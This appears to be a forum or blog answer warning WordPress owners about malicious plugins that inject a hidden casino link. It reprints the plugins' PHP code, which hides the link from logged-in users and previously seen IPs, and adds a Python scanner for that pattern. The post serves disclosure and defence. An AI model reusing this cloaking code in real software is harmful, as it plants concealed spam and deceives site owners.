The link is caused by a malicious WordPress plugin downloaded directly from wordpress.org. The attacker just keeps creating new plugins after they get banned. However, if you use any of the following plugins:
seo-cheese
g-translate (note the hyphen - other versions are fine)
seo-interlinking
return-to-top
google-maps-by-daniel-martyn
I would strongly recommend that they be removed immediately, as they are all operated by the same hacker and insert these dodgy links at the top of your page. If not - I would love to know which plugins you have so I can investigate and report the malicious plugin to wordpress.org.
Useful reading for information about the same attack
http://wordpress.org/support/topic/strange-link-to-casino-online-appeared-at-the-top-of-my-blog
http://wordpress.org/support/topic/random-casino-link-has-appeared-on-my-wordpress-site
http://www.techyduck.com/web-design-developments/wordpress-site-hacked-showing-httponline-casino-blog-ca-in-header/
Malicious code (this is normally found in plugin directory -> setup.php or install.php)
<?php
if (is_user_logged_in()) { $loggedin = 'yes'; } else { $loggedin = 'no'; }
if ($loggedin == 'no') {
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/seo-cheese/created.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
?>
<p align="center"><a href="http://online-casino.blog.ca">http://online-casino.blog.ca</a></p>
<?php //
} else {
echo '';
}}
?>
Sites that are linked to the same hacker
The following sites are linked to the same hacker and listing them here will hopefully help other people who have the same issue.
Other information about this hack
The trick works well because, as you have found, the link itself is not visible to the site owner: firstly, it doesn't show if you are logged in to your own site, and secondly, it also keeps a log of all past IP addresses that successfully logged in before and hides the link (read source code above for details on this).
Hack prevention
Be very cautious of new plugins on wordpress.org as it seems they are not adequately checked (perhaps initially but the plugin creator can easily modify the code with new versions). Trust only plugins that have more popularity and read through the comments and ratings.
If you think you have this issue on your site, a very quick way to find out is to try running your site in safe mode to temporarily disable plugins (just add '?safe_mode=1' to your URL while logged in).
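A file scanner for the cloaking pattern in the sample above, as an added example that is not part of the original post: it flags plugin PHP files that combine a login-state check, a read of the visitor IP and a hard-coded absolute link. The signal names, the threshold and the two demo files are assumptions made for illustration; a hit means the file should be reviewed by hand, not that it is malicious.

```python
import re
import tempfile
from pathlib import Path

# Signals from the sample above: login-state check, visitor IP read, hard-coded absolute link.
SIGNALS = {
    "login_check": re.compile(r"\bis_user_logged_in\s*\("),
    "visitor_ip": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"),
    "hardcoded_link": re.compile(r"<a\s[^>]*href\s*=\s*['\"]https?://", re.I),
}

def scan_file(path):
    """Return the sorted names of the signals found in one PHP file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    return sorted(name for name, rx in SIGNALS.items() if rx.search(text))

def scan_plugins(plugins_dir, threshold=3):
    """Map relative path -> signals for files with at least `threshold` signals."""
    root = Path(plugins_dir)
    findings = {}
    for php in sorted(root.rglob("*.php")):
        hits = scan_file(php)
        if len(hits) >= threshold:
            findings[php.relative_to(root).as_posix()] = hits
    return findings

# Constructed sample files (not real plugins); example.invalid is a placeholder.
CLOAKED = """<?php
if (!is_user_logged_in()) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $seen = file_get_contents(__DIR__ . '/created.txt');
    if (strpos($seen, $ip) === false) { ?>
<p align="center"><a href="http://example.invalid">link</a></p>
<?php } } ?>
"""
BENIGN = "<?php if (is_user_logged_in()) { echo '<a href=\"/wp-admin/\">Dashboard</a>'; }\n"

def build_demo_tree(root):
    """Write the two constructed files under root/<plugin>/ and return root."""
    for rel, body in (("demo-cloaked/setup.php", CLOAKED), ("demo-clean/main.php", BENIGN)):
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(scan_plugins(build_demo_tree(tmp)))
```

On a real site, pass the path of wp-content/plugins to scan_plugins; lowering threshold to 2 widens the net at the cost of more files to review.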